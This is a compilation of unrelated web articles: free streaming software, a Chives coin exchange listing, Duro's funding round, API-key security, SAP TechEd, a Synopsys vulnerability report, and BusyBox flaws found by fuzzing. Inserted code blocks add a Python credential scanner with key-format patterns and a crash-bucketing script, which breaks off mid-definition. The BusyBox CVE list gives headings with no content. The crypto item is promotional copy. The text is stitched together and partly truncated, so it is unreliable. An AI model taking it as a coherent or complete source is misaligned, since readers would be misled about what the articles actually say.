XSplit, OBS, or Streamlabs: What's the best free streaming software – Polygon

I quit my job at the start of 2020. Two months later, the U.S. went into lockdown and everyone glued themselves to their screens. So, like many avid gamers, I started streaming on Twitch. After deciding what to stream and when, and acquiring a webcam, I had to pick my broadcasting software. When you're starting out as a streamer, your budget, or lack thereof, is going to be a major factor. And to this day, I haven't felt the need to move to a paid broadcasting platform because so much can be accomplished with free options.

After a casual Google search, I initially settled on XSplit. The setup process was fairly straightforward, which took a lot of the guesswork and scouring the net for guides out of the equation. XSplit is probably best known for allowing users to stream content to multiple platforms, like Twitch, Facebook Gaming, and YouTube. It also boasts the ability to tweak video settings for resolution up to 4k and frames per second well above the standard 60fps.

That said, XSplit requires you to either create an account or sign in with an existing social media account. And unless you pay for an XSplit subscription, you'll only be able to stream to a single platform, and quality levels will be capped at 720p and 30fps.

It's also important to note that the features differ on each platform. For example, Twitch does not support 4k resolution in streams, while YouTube does. Also, while XSplit allows for higher framerate settings, Twitch, Facebook Gaming, and YouTube all recommend streaming at no higher than 60fps.

When I first started, I got set up on Twitch, then decided to maximize my potential audience by creating a Facebook page and streaming to both sites simultaneously, though not with XSplit, as streaming to multiple sources is a premium feature. Then I qualified for the Twitch Affiliate program.

Without getting too off-topic, I'm going to remind everyone of the importance of reading contracts. One of the stipulations that many streamers miss in the Twitch Affiliate contract is that Twitch owns the exclusive rights to every one of their streams for 24 hours, which means that everything, including clips, cannot be uploaded or streamed on another platform. I promptly stopped dual-streaming to Facebook.

I had a lot of success using XSplit. It's a solid piece of software and has received numerous updates since I first tried it. But, in my search for the best combination of options and features from free software, I decided to move on to a different program: Open Broadcaster Software.

Aptly named, OBS is open source, which means that power users can code their own plugins and casual users can download and use them. This also means that bugs are usually caught and fixed quickly, and it's usually the first program to get new updates.

The setup process for OBS is both simpler and more complicated than the setup for XSplit: while the initial download-and-run installer works in its favor, OBS requires much more tweaking to ensure the best stream quality for your audience. The manual setup can take some serious time and research.

On top of that, OBS lacks a chat overlay and customizable themes out of the box. These stream theme overlays must be separately downloaded and manually installed, which isn't terribly difficult but takes more effort than other options.

But it isn't all bad. OBS has plenty of advantages, too. Unlike XSplit's free version, OBS allows for livestreaming at 1080p and 60fps, taking full advantage of the recommended limits. It's also less resource-intensive, saving your CPU for more important things like your game. OBS also supports multi-platform streaming.

OBS was good to me, but I never felt like it clicked. The options for making my stream look and feel the way I wanted just weren't there. Instead, my strongest recommendation for free broadcasting software goes to Streamlabs' platform.

Streamlabs is a company built for livestreamers. Because OBS is open source, users have been able to build their own versions on top of it, enabling streamers to choose from all kinds of premade tools, like chat monitoring bots and overlays. But that's not all Streamlabs does. It also has tools for building your community and editing your clips.

Streamlabs' setup process is the easiest by far, taking advantage of Open Broadcaster Software's plug-and-play approach. The key difference, however, lies in the built-in optimizer. Rather than having to manually select the best settings for your streaming machine, the optimizer takes care of everything for you.

Where Streamlabs really shines, though, is in its customization options. Both OBS and Streamlabs have adjustable user interfaces. Simply click and drag the various informational boxes around the window to suit your needs. But Streamlabs makes personalizing the layout and design that your audience sees and interacts with much more convenient.

Streamlabs also has a bunch of free overlays available on its site. Instead of hunting for a stream overlay that matches your style and vibe, then downloading and going through the trouble of integrating it into OBS, you can simply install it directly with the click of a button. Remember to keep your hardware limits in mind, though, as every additional tool running on top of Streamlabs will take more power from your CPU.

How you set up the streaming experience and manage the backend can greatly impact your audience's first impressions, as well as make watching the stream more enjoyable. Animated backgrounds, chat management bots, and sound alerts create a more engaging experience. And it will take time to curate the perfect blend of immersive and meta features that make your stream unique.

You'll also want to be comfortable working with the settings and tweaking your stream's visuals and sound effects. While Streamlabs is the clear winner of the big three free options, some companies that offer sponsorship deals will be partnered with another company's platform, like StreamElements' OBS.

(While I was writing this article, controversy arose surrounding Streamlabs' new premium service. Despite feeling conflicted about recommending Streamlabs, I still believe that its free broadcasting software is the best choice for streamers. I'd encourage you to look further into the situation and weigh the options for yourself.)

Whether you are starting to stream as a hobby or hoping to turn it into your next career move, livestreaming requires some serious legwork. The best thing you can do is be informed of the pros and cons of each option, and choose the best fit for your streaming needs.

LBank Exchange Will List Chives coin (XCC) on November 19, 2021 – bitcoinist.com

INTERNET CITY, DUBAI, Nov. 18, 2021: LBank Exchange, a global digital asset trading platform, will list Chives coin (XCC) on November 19, 2021. For all users of LBank Exchange, the XCC/USDT trading pair will be officially available for trading at 20:00 (UTC+8) on November 19, 2021.

Since the birth of cryptocurrencies such as Bitcoin and Ethereum, discussion of the environmental pollution and energy waste caused by their mining process has never stopped. As a completely decentralized, community-governed green cryptocurrency with no reservation and no ICO, Chives coin (XCC) aims to create a low-power, green and environmentally friendly blockchain system. The XCC token will be listed on LBank Exchange at 20:00 (UTC+8) on November 19, 2021, to further expand its global reach and help it achieve its vision.

Chives is an eco-friendly blockchain based on proof of space and time (PoST) without pre-mine and ICO. It's not affiliated with Chia Network Inc., but is built on Chia's open source code. As a hard fork created by community volunteers, Chives uses a combination of PoST and proof of service (PoSE) in order to prevent large mining pools from dominating.

Farmers of Chives can use free hard disk space to mine 90% of Chives openly, fairly and transparently. The income of Chives farmers is proportional to the amount of allocated space. If a farmer has 10 times more space, the farmer will get 10 times more rewards. Chives is proof that modern blockchains can be eco-friendly, safe, and effective at the same time.

The Chives project pays special attention to the development of an eco-friendly blockchain, as well as related technological products. The Chives network supports a token issuance mechanism similar to ERC-20 and supports an NFT issuance mechanism similar to ERC-721. At the moment, the project has already developed its own Chives Swap exchange, a web wallet, and a marketplace for selling pets for the future NFT game.

The game will directly promote the application and popularization of core products such as stable coins (USDT), tokens (ERC-20), NFT (ERC-721), automated exchanges (AMM), and mobile wallets on the Chives blockchain. This greatly contributes to the growth and popularization of the Chives network and will bring various ecological designs on the Chives blockchain to a new level.

Chives as a whole is based on the Chia branch, adding asset mortgage, community autonomy, budget review and other functions. 90% of XCC is allocated to miners and the remaining 10% is allocated to participants who contribute to the Chives community ecosystem. Chives upholds the spirit of openness and open source, and encourages people from all walks of life to work together to promote the development of Chives.

The goal of the Chives project is to create an independent community and a global decentralized payment network using its own cryptocurrency, called Chives or XCC, as the main payment method. The XCC token will be listed on LBank Exchange at 20:00 (UTC+8) on November 19, 2021; investors who are interested in Chives coin can easily buy and sell XCC on LBank Exchange from then on. The listing of XCC on LBank Exchange will undoubtedly help it further expand its business and draw more attention in the market.

Learn More about XCC Token:

Official Website: https://www.chivescoin.org

Twitter: https://twitter.com/chives_project

Telegram: https://t.me/chives_network

Listing Announcement on LBank Exchange: https://support.lbank.site/hc/en-gb/articles/4409594129177Chives-coin-XCC-will-be-listed-on-LBank

LBank Exchange, founded in 2015, is an innovative global trading platform for various crypto assets. LBank Exchange provides its users with safe crypto trading, specialized financial derivatives, and professional asset management services. It has become one of the most popular and trusted crypto trading platforms with over 6.4 million users in more than 210 countries around the world.

Contact Details:

LBK Blockchain Co. Limited

LBank Exchange

marketing@lbank.info

Duro drags hardware product development into the age of agile – TechCrunch

To software developers, the process of creating a hardware product can seem distinctly 1980s. Even in the most high-tech of workflows, there are tons of error-prone and potentially expensive manual steps, including spreadsheets, confusion and a general feeling of the will to live sagging away through the musty, solder-stained floorboards of the hardware development shop. Along comes Duro and the $4 million the company just raised, in an attempt to bring some agile methodology sanity to a final-bill-of-materials.top-assembly.final.final.final.final.no-really-final-this-time.xls world.

Duro's fundraising round was led by B2B SaaS investors Bonfire Ventures, with follow-on money from hard-tech investors Riot Ventures. The new funding will be used to expand sales and marketing teams and to further develop Duro's product lifecycle management (PLM) solutions.

"I am a former electrical engineer. For 20 years I designed and manufactured products: IoT, drones, telecom equipment, wearables, cleantech, you name it. I got frustrated with how much of my time was being spent managing the most fundamental elements of hardware development: CAD files, your bill of materials and your supply chain data," explains Duro's CEO Michael Corr. "There's a product category called Product Lifecycle Management, or PLM, which is meant to be a receptacle for that information, for centralizing and managing it. It includes revision control, and you use it with your own teams, as well as sharing it with your contract manufacturers. And yet none of the tools I used were actually saving time or actually providing value at the end of the day. It's all done so manually and is so process-driven that it was often easier to just use spreadsheets. That's still the prevalent technology today, because the established tools are just so damn complicated and prone to error, and they're not actually providing value."

With an axe to grind against the status quo, co-founders Michael Corr and Kellan O'Connor developed Duro as a cloud platform to centralize all product data and remove the friction of connecting disparate teams and tools. The goal is transparency: giving everyone, from the product teams and the engineering teams to the suppliers and manufacturing teams, access to the most accurate and most recent data at all times.

"To simplify things a little, the hardware industry is dominated by a bimodal culture. You have the older generation that came into the workforce in the '80s and '90s, who established these toolsets that we have today. Meanwhile, there is a gap: young engineers were more interested in learning web, mobile and app development, as it was so much more in vogue. There wasn't a continuation of young engineers entering the hardware space," says Corr, outlining the market landscape where Duro is staking out its territory. "But now they're coming back. Hardware has proven itself to be a sexy product. IoT happened, and the cost of developing hardware came down drastically. Now what we are seeing is a wave of a younger generation of engineers that's entering the workforce. They are the ones that Duro is going after. They are used to the culture from software development, and they have different standards for the software they use."

In other words, where SaaS, GitHub and dev/ops processes completely changed how software is delivered on an ongoing basis, Duro wants to take similar mechanics and invite the hardware folks to join the current millennium.

"GitHub did an excellent job of proving that it can be done. You can have a single cloud-hosted source of your source code control, and then you build an ecosystem of tools and people and tasks around it. And everyone's always pointing to GitHub. In the hardware industry, traditionally, that hasn't been the case. You have multiple teams doing their disparate responsibilities: electrical engineering, mechanical engineering, procurement, manufacturing, etc. Because there hasn't been a concept of centralizing it, everybody has their own copy of the data," explains Corr. "Everybody has their own separate copy of the bill of materials, for example, and that creates a problem. It creates this additional necessity of overhead to manage all those communication channels and making sure that everybody has the latest copy."

"We're incredibly excited to partner with Duro, which is bringing a fresh solution to a big market dominated by old companies. When a startup like Duro lowers the barrier to entry for a whole new set of users, it positions them to get the lion's share of that new addressable market," said Jim Andelman, co-founder and managing director at Bonfire Ventures. "Customer affinity for Duro's platform is off the charts: it's clear to us that this is the PLM solution of choice for engineering-driven businesses."

In addition to the product itself, the company is innovating on its business model, taking a leaf out of the SaaS playbook.

"There's a lot of friction in software sales for hardware in the past. Very expensive applications, driven by user-license business models. And there are rarely trials available: if you want to use it, you just have to pay for it and just accept what you get. So Duro innovates a little bit there too. We have three subscription packages. The starter package allows companies who know that spreadsheets are not a good solution and want to get into properly managed data, centralized and controlled environments. The Pro version works right out of the box, without the complex configuration and setup needed by other products. It's designed for teams who are at the cusp of doing their first round of production, and want to do proper revision control and interface with their suppliers," explains Corr. "Our enterprise package is more the expansive package for teams that have outgrown those lower two tiers, or that are just more established and they have existing workflows."

The starter package is $450 a month or $5,400 a year. The Pro package weighs in at $750 per month or around $9,000 per year. The enterprise package is a little bit more open ended, depending on the needs of the customer. The Duro team told me that they have contracts ranging from $25,000 to $100,000, depending on how the software is configured.

"Given our extensive experience investing in full-stack businesses, we know that issues surrounding data continuity are synonymous with hardware manufacturing and weigh heavily on the industry," said Will Coffield, co-founder and general partner at Riot Ventures. "We love Duro's approach to modernizing hardware design/development, using automation to replace manual processes and connect teams to information for intelligent and efficient collaboration."

Chris Horn: Digital authentication is an intriguing innovation space – The Irish Times

"Hackers rarely actually break in; instead, they simply log in" is a worn cliché among computer security protagonists. Hackers can and do exploit defects in software code, where errors by the original authors are manipulated to enable unintended access.

If you are a Windows, Mac, Android or iPhone user, no doubt you receive regular notices that your device should now be updated to the latest version of its host software, so as to repair newly discovered security vulnerabilities.

But if a hacker can discover or deduce the password credentials for an account, it is obviously much simpler to just log in using these and so gain access.

Passwords have been critical to protect online access to our email, online shopping carts, newspaper subscriptions, bank accounts and much more. We are strongly advised that we should never use the same password for different services, never make them too short, and never make them easy to guess. We should always change them regularly, should always use random collections of numbers and letters and punctuation marks, and should keep them private.

In short, they are incredibly inconvenient but apparently an awkward necessity for our digital lives.

Help with remembering passwords is offered by digital vaults and password managers that can administer your password portfolio on your behalf. They can synchronise passwords across the different devices you may own, and usually offer to scan the dark web looking for any compromised accounts.

However, the industry, led by Google, Microsoft, Apple and others, is now rapidly moving to a password-less world in which passwords can be completely avoided. The most obvious alternatives are based on biometrics, such as scanning your face or a fingerprint.

But you may baulk at major multinationals easily accumulating a huge collection of personal identity information across much of the planet, potentially invaluable to governments and police agencies alike.

Whatever the pros and cons of the various authentication approaches for us to log in to our computers, you may not realise that software systems also make extensive use of passwords. These take the form of digital API keys used to gain access to databases and other software services across the web.

These authentication credentials are not intended to be remembered by humans at all, and so usually take the form of lengthy strings of letters and numbers, randomly generated as needed.

Unlike a login password which identifies a particular user, they instead identify a particular software application, component or subsystem that may in fact be used by very many human users.

For example, if a particular app on your smart device uses a Google map (such as a taxi-hailing app, or a courier or food delivery app), the app must present its API key to Google's mapping service each time the app is run, regardless of which particular user happens to be running the app. The API key is set when the app is built, and is used by Google to verify legitimate use of its mapping service by an authorised app.

Digital keys are routinely used within application software to access payment services, databases, and other web services.

While Google does not charge app developers for integrating its mapping service into their apps, some software services offered over the web to developers do charge for their use. The API key is then critical to authenticating and charging the relevant app owner, who may then recover the cost by charging app fees to end users.

Thankfully, when you use an app, you do not need to know these various internal API keys in addition to your own personal passwords. Nevertheless, the keys must appear somewhere deep within the system, and are a potential security vulnerability. If a hacker discovers such a digital secret, they can potentially script software to explore a service and any data which it may have accumulated, or run up costs for fraudulent use.

Software developers frequently work in teams, and may also re-use software published in open source by the community in software repositories. It is not unusual to find API keys and authentication credentials unintentionally published within software source code.

Fortunately for software developers, there are a number of tools which can scan the source code, searching for keys and credentials associated with particular web-based services, and generate an appropriate warning if discovered.
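Secret scanners of the kind the column describes work roughly as follows. This is an added example, not the author's or any vendor's tool: it checks source lines against a few well-known public key formats (the "AIza", "AKIA" and "ghp_" prefixes of Google API keys, AWS access key IDs and GitHub personal access tokens) and applies a Shannon-entropy heuristic to quoted literals assigned to credential-looking names, while ignoring obvious placeholders and environment-variable lookups. The sample source file and every key value in it are constructed.

```python
"""Minimal secret scanner: flags credential literals in source text.

Constructed example; the patterns cover only three well-known public key
formats plus a generic entropy heuristic, not a real tool's catalogue.
"""
import math
import re
from collections import Counter

# Public formats of a few service credentials (fixed prefix + fixed-length body).
SERVICE_PATTERNS = {
    "Google API key": re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b"),
    "AWS access key ID": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "GitHub personal access token": re.compile(r"\bghp_[0-9A-Za-z]{36}\b"),
}

# A quoted literal assigned to a credential-looking name, e.g. client_secret = "...".
ASSIGNMENT = re.compile(
    r"(?i)\b\w*(?:api[_-]?key|secret|token|password|passwd)\w*\s*[:=]\s*"
    r"[\"']([^\"']{8,})[\"']"
)

# Substrings that mark documentation placeholders or templates, not live secrets.
PLACEHOLDER_WORDS = ("example", "changeme", "your_", "placeholder", "xxxx", "<", "${")
HIGH_ENTROPY_BITS = 3.5   # bits/char typical of randomly generated keys
HIGH_ENTROPY_MIN_LEN = 16


def shannon_entropy(s: str) -> float:
    """Bits per character: ~4.5+ for random base64-like strings, ~2-3 for words."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def redact(value: str) -> str:
    """Never echo the whole secret into logs or CI output."""
    return value[:4] + "..." + value[-4:] if len(value) > 12 else value[:2] + "..."


def scan_line(line: str, lineno: int) -> list:
    """Return a list of finding dicts for one source line (empty if clean)."""
    findings = []
    for kind, pat in SERVICE_PATTERNS.items():
        for m in pat.finditer(line):
            findings.append({"line": lineno, "kind": kind,
                             "preview": redact(m.group(0)),
                             "entropy": round(shannon_entropy(m.group(0)), 2)})
    if findings:
        return findings  # already attributed to a service; skip the generic check
    for m in ASSIGNMENT.finditer(line):
        value = m.group(1)
        if any(w in value.lower() for w in PLACEHOLDER_WORDS):
            continue  # template or documentation placeholder
        bits = shannon_entropy(value)
        high = bits >= HIGH_ENTROPY_BITS and len(value) >= HIGH_ENTROPY_MIN_LEN
        level = "high" if high else "low"
        findings.append({"line": lineno,
                         "kind": f"hard-coded credential ({level} entropy)",
                         "preview": redact(value), "entropy": round(bits, 2)})
    return findings


def scan_source(text: str) -> list:
    """Scan a whole file's text; findings are ordered by line number."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        findings.extend(scan_line(line, lineno))
    return findings


# Constructed sample source file; the key values are fabricated, not real credentials.
SAMPLE_SOURCE = """\
import os
MAPS_KEY = "AIzaSyDEXAMPLE0123456789abcdefghijklmno"
aws_access_key_id = "AKIAIOSFODNN7EXAMPLE"
API_KEY = "YOUR_API_KEY"
db_password = "hunter22"
token = os.environ["SERVICE_TOKEN"]
client_secret = "q7Zp9vK2mX4rT8bN1cW6yL3hJ5dF0gA"
"""

if __name__ == "__main__":
    for f in scan_source(SAMPLE_SOURCE):
        print(f"line {f['line']}: {f['kind']} ({f['preview']}, {f['entropy']} bits/char)")
```

Lines 4 and 6 of the sample are deliberately clean: a placeholder string and a lookup from the environment are what a developer should ship instead of a literal.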

But in the same way that users are being encouraged to go password-less and rely instead on other authentication mechanisms, innovation may ultimately displace the need for API keys, so removing authentication vulnerabilities and also avoiding the need for scanning and detection tools.

A more sophisticated approach might use a two-stage or even a multistage handshake, and perhaps only be run in full when an app is installed or updated.

Digital authentication is an intriguing innovation space because of the countermeasures and counter-countermeasures continuously being conceived by the good and bad guys alike.

SAP TechEd sets sights on hyperscalers with developer tools – TechTarget

SAP is expanding its tools and services for developers of all skill levels, with several announcements from this week's SAP TechEd 2021 virtual conference.

SAP TechEd is an annual gathering of the SAP developer community that provides information on new tools and services, along with learning content and sessions that enable SAP developers to expand their skills.

For experienced developers, SAP is now providing individual access to the free tier model of SAP Business Technology Platform (BTP), SAP's integrated development environment. Previously, SAP BTP was available to only licensed SAP customers and partners.

SAP is also now offering its veteran Advanced Business Application Programming (ABAP) developers a cloud-ready development environment for the programming language inside SAP S/4HANA Cloud. Formally named SAP S/4HANA Cloud ABAP Environment, the new platform is derived from the SAP BTP ABAP cloud environment known as Steampunk and is referred to as "Embedded Steampunk."

For business users with limited development skills or citizen developers, SAP made SAP AppGyver generally available. SAP AppGyver is a low-code/no-code development platform that SAP acquired in February. The platform will be available in SAP BTP.

In order to enhance the skills of developers at all levels, SAP launched a new SAP Learning site, which contains learning content including expert-led sessions, hands-on training and microlearning videos.

The intent behind the SAP TechEd announcements is to provide developers with tools and services to build applications that can address some of the challenges businesses face, including the pandemic, global climate change and inequality, Juergen Mueller, CTO at SAP, said during his executive keynote at SAP TechEd.

Opening the free tier for SAP BTP is something that SAP developers have been asking for, he said.

"SAP BTP is now available to individual developers, so you can now discover and experience SAP BTP services without any financial commitment," Mueller said. "This has been a journey that many [SAP developers] have been following very closely and have contributed actively to this milestone."

One of the problems companies are facing is a shortage of skilled developers, which makes the availability of low-code/no-code platforms like AppGyver and the opportunity to build skills through the SAP Learning site more important than ever, according to Mueller.

"A huge technology talent gap is opening up that needs to be filled, so SAP is giving open access to learning resources and providing low-code and no-code solutions as a way out of this dilemma," he said.

The products and services announced at TechEd should provide value for various developer levels, said Tammy Powlas, a business analyst at a utilities company and an SAP Mentor (an SAP technology advocate selected by members of the SAP community). She pointed specifically to individual access to the free tier for SAP BTP and general availability of AppGyver.

"I know as a [Project Management Professional] that the Project Management Institute says there's a shortage of developers and the citizen developer is the answer, so it's good to see SAP focus on AppGyver as the low-code and no-code solution."

The Learning site, SAP's relaunched learning center, is a key for developer success, she said.

"What links these all together is the free SAP Learning site that includes free training for low-code/no-code and SAP BTP solutions," Powlas said.

The new tools and services fill some gaps that needed to be filled for SAP developers, said Holger Mueller, vice president and principal analyst at Constellation Research.

AppGyver, for example, is an overdue item in SAP's low-code toolset, which should see more uptake now that it's embedded in SAP BTP, Mueller said.

"The free tier access for SAP BTP is a good move but SAP needs to convince on its merit, but they are not there yet," he said. "The S/4HANA Cloud ABAP Environment, Embedded Steampunk, is very good and overdue, this is the one key announcement for the existing customer and ecosystem."

SAP needs to get in the game against the developer tool sets from public cloud hyperscalers Amazon, Google Cloud Platform and Azure, which are becoming go-to developer environments for professional development and low-code and no-code development, said Joshua Greenbaum, principal at Enterprise Applications Consulting. He said he believes the announcements from TechEd are a step in that direction and should help developers stay within the SAP platforms to build applications.

"SAP wants these extensions, net-new developments, citizen apps, RPA -- everything possible -- to run on SAP BTP because that makes their platform sticky and helps them fend off the hyperscalers who are making big inroads into their own developer communities," Greenbaum said.

Indeed, SAP appears to have gotten the free tier for SAP BTP right, agreed Jon Reed, co-founder of Diginomica, an enterprise computing industry analysis firm.

"It was a long time coming, and developers and [SAP developer] community leaders have been pressing SAP for this kind of developer agreement for years," he said. "We need to see how it plays out, but it appears that SAP now has a free tier on par with the hyperscalers and open source development environments."

SAP's commitment to low-code and no-code is clear and useful for both experienced and citizen developers, Reed said, but the availability of SAP AppGyver is a little underwhelming given the availability of low-code tools.

"Making AppGyver available to more citizen developers is welcome, but there are multiple tools for different uses, including third-party tools," he said. "SAP needs to provide more roadmap guidance and use case clarity on its various low-code environments going forward, like AppGyver, Ruum and Business Application Studio."

But Greenbaum countered that having a wealth of low-code and no-code options that all perform different functions -- AppGyver is particularly suited to building iOS and Android mobile interfaces -- is not a bad thing.

"It's both the blessing and the curse of any large enterprise software company, not just SAP, to have a confusing number of options," he said. "Everyone gets a little baffled, but any good bar has a good selection of beers, so it's about what people want."

The main goal for SAP in offering the development platforms and services is to prove that it's still an innovating enterprise company, Greenbaum said.

"SAP really has to build back its developer community," he said. "It has to build back this sense that they are the leading-edge innovators and break away from what it's tending to look like, which at times is just the legacy place to go to keep the lights on. If they don't capture innovation at the edge, they're doomed to legacy ERP status."

Jim O'Donnell is a TechTarget news writer who covers ERP and other enterprise applications for SearchSAP and SearchERP.

Synopsys Research Finds Vulnerabilities in 97% of Applications, 36% Impacted by Critical- or High-Risk Vulnerabilities – Yahoo Finance

2021 Software Vulnerability Snapshot report examines prevalence of vulnerabilities identified by Synopsys Application Security Testing Services.

MOUNTAIN VIEW, Calif., Nov. 16, 2021 /PRNewswire/ -- Synopsys, Inc. (Nasdaq: SNPS) today published "2021 Software Vulnerability Snapshot: An Analysis by Synopsys Application Security Testing Services," a report examining data from 3,900 tests conducted on 2,600 targets (i.e., software or systems) during 2020. The data, compiled by tests performed by Synopsys security consultants in our assessment centers for our customers, included penetration testing, dynamic application security testing, and mobile application security analyses, designed to probe running applications as a real-world attacker would.

Eighty-three percent of the tested targets were web applications or systems, 12% were mobile applications, and the remainder were either source code or network systems/applications. Industries represented in the tests included software and internet, financial services, business services, manufacturing, media and entertainment, and healthcare.

"Cloud-based deployments, modern technology frameworks, and the rapid pace of delivery is forcing security groups to react more quickly as software is released," said Girish Janardhanudu, vice president, security consulting at Synopsys Software Integrity Group. "With insufficient AppSec resources in the market, organizations are leveraging application testing services such as those Synopsys provides in order to flexibly scale their security testing. We've seen a heavy increase in assessment demand throughout the pandemic."

In the 3,900 tests conducted, 97% of the targets were found to have some form of vulnerability. Thirty percent of the targets had high-risk vulnerabilities, and 6% had critical-risk vulnerabilities. The results demonstrate that the best approach to security testing is to utilize the wide spectrum of tools available to help ensure an application or system is free from vulnerabilities. For example, 28% of the total test targets had some exposure to a cross-site scripting (XSS) attack, one of the most prevalent and destructive high-/critical-risk vulnerabilities impacting web applications. Many XSS vulnerabilities occur only when the application is running.


Other report highlights

2021 OWASP Top 10 vulnerabilities were discovered in 76% of the targets. Application and server misconfigurations were 21% of the overall vulnerabilities found in the tests, represented by the OWASP A05:2021 Security Misconfiguration category. And 19% of the total vulnerabilities found were related to the OWASP A01:2021 Broken Access Control category.

Insecure data storage and communication vulnerabilities plague mobile applications. Eighty percent of the discovered vulnerabilities in the mobile tests were related to insecure data storage. These vulnerabilities could allow an attacker to gain access to a mobile device either physically (i.e., accessing a stolen device) or through malware. Fifty-three percent of the mobile tests uncovered vulnerabilities associated with insecure communications.

Even lower-risk vulnerabilities can be exploited to facilitate attacks. Sixty-four percent of the vulnerabilities discovered in the tests are considered minimal-, low-, or medium-risk. That is, the issues found are not directly exploitable by attackers to gain access to systems or sensitive data. Nonetheless, surfacing these vulnerabilities is not an empty exercise, as even lower-risk vulnerabilities can be exploited to facilitate attacks. For example, verbose server banners (found in 49% of the tests) provide information such as server name, type, and version number, which could allow attackers to perform targeted attacks on specific technology stacks.

An urgent need for a software Bill of Materials. Of note was the number of vulnerable third-party libraries in use, found in 18% of the penetration tests conducted by Synopsys Application Testing Services. This corresponds with the 2021 OWASP Top 10 category A06:2021 Use of Vulnerable and Outdated Components. Most organizations typically use a mix of custom-built code, commercial off-the-shelf code, and open source components to create the software they sell or use internally. Often those organizations have informal (or no) inventories detailing exactly what components their software is using, as well as those components' licenses, versions, and patch status. With many companies having hundreds of applications or software systems in use, each themselves likely having hundreds to thousands of different third-party and open source components, an accurate, up-to-date software Bill of Materials is urgently needed to effectively track those components.

To learn more, download the "2021 Software Vulnerability Snapshot: An Analysis by Synopsys Application Security Testing Services," or read the blog post.

About the Synopsys Software Integrity Group

Synopsys Software Integrity Group helps development teams build secure, high-quality software, minimizing risks while maximizing speed and productivity. Synopsys, a recognized leader in application security, provides static analysis, software composition analysis, and dynamic analysis solutions that enable teams to quickly find and fix vulnerabilities and defects in proprietary code, open source components, and application behavior. With a combination of industry-leading tools, services, and expertise, only Synopsys helps organizations optimize security and quality in DevSecOps and throughout the software development life cycle. Learn more at http://www.synopsys.com/software.

About Synopsys

Synopsys, Inc. (Nasdaq: SNPS) is the Silicon to Software partner for innovative companies developing the electronic products and software applications we rely on every day. As an S&P 500 company, Synopsys has a long history of being a global leader in electronic design automation (EDA) and semiconductor IP and offers the industry's broadest portfolio of application security testing tools and services. Whether you're a system-on-chip (SoC) designer creating advanced semiconductors, or a software developer writing more secure, high-quality code, Synopsys has the solutions needed to deliver innovative products. Learn more at http://www.synopsys.com.

Editorial Contact: Liz Samet, Synopsys, Inc., 703-657-4218, esamet@synopsys.com


View original content: https://www.prnewswire.com/news-releases/synopsys-research-finds-vulnerabilities-in-97-of-applications-36-impacted-by-critical--or-high-risk-vulnerabilities-301425386.html

SOURCE Synopsys, Inc.

Continued here:

Synopsys Research Finds Vulnerabilities in 97% of Applications, 36% Impacted by Critical- or High-Risk Vulnerabilities - Yahoo Finance

Claroty and JFrog discover 14 vulnerabilities in Busybox – SecurityBrief New Zealand

Team82 and JFrog have announced the discovery, by using static and dynamic techniques, of 14 vulnerabilities affecting the latest version of BusyBox.

Typically found in embedded devices with limited memory and storage resources, BusyBox is marketed as the Swiss Army Knife of embedded Linux. It's a software suite of useful Unix utilities, known as applets, packaged as a single executable file.

BusyBox can be found on many OT and IoT devices, including popular programmable logic controllers (PLCs), human-machine interfaces (HMIs), and remote terminal units (RTUs) - many of which now run on Linux.

As part of a commitment to improving open-source software security, Claroty's Team82 and JFrog collaborated on a vulnerability research project examining BusyBox.

To research BusyBox, they used static and dynamic analysis approaches. First, a manual review of the BusyBox source code was conducted in a top-down approach (following user input up to specific applet handling). They also looked for obvious logical or memory corruption vulnerabilities.

The next approach was fuzzing. They compiled BusyBox with ASan and implemented an AFL harness for each BusyBox applet. Each harness was subsequently optimised by removing unnecessary parts of the code, running multiple fuzzing cycles on the same process (persistent mode), and running multiple fuzzed instances in parallel.

Details of the vulnerabilities

According to the collaboration, since the affected applets are not daemons, each vulnerability can only be exploited if the vulnerable applet is fed with untrusted data - usually through a command-line argument.

Specifically, these are the conditions that must occur for each vulnerability to be triggered:

CVE-2021-42373:

CVE-2021-42374:

CVE-2021-42375:

CVE-2021-42376:

CVE-2021-42377:

CVE-2021-42378, CVE-2021-42386:

"We started from fuzzing all the daemon applets, including HTTP, Telnet, DNS, DHCP, NTP etc. Many code changes were required in order to effectively fuzz network-based input," the companies explain.

"For example, the main modification we performed was to replace all recv functions with input from STDIN to support fuzzed inputs. Similar changes were done when we fuzzed non-server applets as well."

Claroty's Team82 and JFrog prepared a couple of examples for each applet and ran hundreds of fuzzed BusyBox instances for a few days.

"This gave us tens of thousands of crashes to evaluate. We had to create classes of crashes with the same root cause to help reduce the volume of crashes we had in our sample set. Later, we minimised each group representative to work with a small subset of unique crash inputs," they say.

To fulfil these tasks, the team developed automatic tooling that digested all crash data and classified it based on the crash analysis report, which mainly includes the crash stack trace, registers, and assembly code of the relevant code area. For example, they merged cases with similar crash stack traces because they usually had the same problematic root cause.

Finally, the team researched each unique crash and minimised its input vector in order to understand the root cause, which allowed them to create a proof-of-concept that exploits the vulnerability responsible for the crash. In addition, they tested their PoCs against several BusyBox versions to understand when the bugs were introduced to the source code.
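The crash-bucketing step described above, written out as an added example (not the Team82/JFrog tooling): it parses constructed ASan-style reports, keys each crash on the error kind plus its top stack frames with addresses and line numbers dropped, and picks the shortest input per bucket as the candidate to minimise. The applet, function and file names in the reports are hypothetical.

```python
import hashlib
import re
from collections import defaultdict

# Added example, not the Team82/JFrog tooling: group ASan crash reports by error
# kind and top stack frames, then pick the shortest input per group as the
# representative worth minimising. Reports, inputs and names are constructed.
ASAN_KIND = re.compile(r"AddressSanitizer: ([A-Za-z-]+)")
ASAN_FRAME = re.compile(r"^\s*#\d+\s+0x[0-9a-f]+\s+in\s+(\S+)\s+(\S+?):\d+", re.M)

CRASHES = {  # crash id -> (fuzzer input, sanitizer report); all constructed
    "id:000001": (b"A" * 300, """\
==11==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000018
READ of size 1 at 0x602000000018 thread T0
    #0 0x4f12ab in parse_field hypothetical_applet.c:88
    #1 0x4f0c10 in applet_main hypothetical_applet.c:140
    #2 0x4e9aa0 in main busybox.c:40
"""),
    "id:000002": (b"A" * 120, """\
==12==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000058
READ of size 1 at 0x602000000058 thread T0
    #0 0x4f12c0 in parse_field hypothetical_applet.c:91
    #1 0x4f0c10 in applet_main hypothetical_applet.c:140
    #2 0x4e9aa0 in main busybox.c:40
"""),
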